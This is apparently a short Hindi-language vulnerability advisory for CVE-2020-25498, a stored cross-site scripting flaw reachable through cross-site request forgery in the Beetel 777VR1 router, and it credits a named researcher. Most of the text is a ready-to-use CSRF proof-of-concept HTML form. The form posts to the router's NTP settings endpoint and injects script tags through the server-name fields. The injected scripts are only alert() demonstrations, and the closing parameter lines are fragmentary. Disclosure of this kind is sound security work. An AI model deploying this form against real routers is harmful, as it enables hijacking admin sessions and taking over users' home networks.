
Beetel 777VR1 राउटर में CSRF के माध्यम से संग्रहीत XSS
यह पहचाना गया है कि असुरक्षित एंडपॉइंट में सर्वर-साइड इनपुट सत्यापन नहीं है और किसी भी दुर्भावनापूर्ण स्क्रिप्ट इंजेक्शन के लिए क्लाइंट-साइड फ़िल्टरिंग का अभाव है। एक हमलावर इस भेद्यता का उपयोग एंडपॉइंट में दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट करने के लिए कर सकता है, और जब भी कोई उपयोगकर्ता असुरक्षित एंडपॉइंट खोलता है तो स्क्रिप्ट सक्रिय हो जाती है। हमलावर डिवाइस पर कब्ज़ा करने और अंततः नेटवर्क पर कब्ज़ा करने के लिए, CSRF के माध्यम से एडमिन मॉड्यूल में XSS निष्पादित करने हेतु POST अनुरोध पेलोड के साथ एक दुर्भावनापूर्ण URL भेज सकता है।
शोधकर्ता: Sayli Ambure (https://twitter.com/sayli_ambure)
MITRE CVE लिंक: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498
CSRF HTML कोड:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/form2ntp.cgi" method="POST">
<input type="hidden" name="ntpstate" value="Enable" />
<input type="hidden" name="ntpserver" value='google.com"><script>alert(1)</script>' />
<input type="hidden" name="ntpserver2" value='google.com"><script>alert(2)</script>' />
<input type="hidden" name="ntpinterval" value="1" />
<input type="hidden" name="ntptimezone" value="330" />
<input type="hidden" name="submit.htm?time.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
पैरामीटर: सर्वर नाम
पैरामीटर: कीवर्ड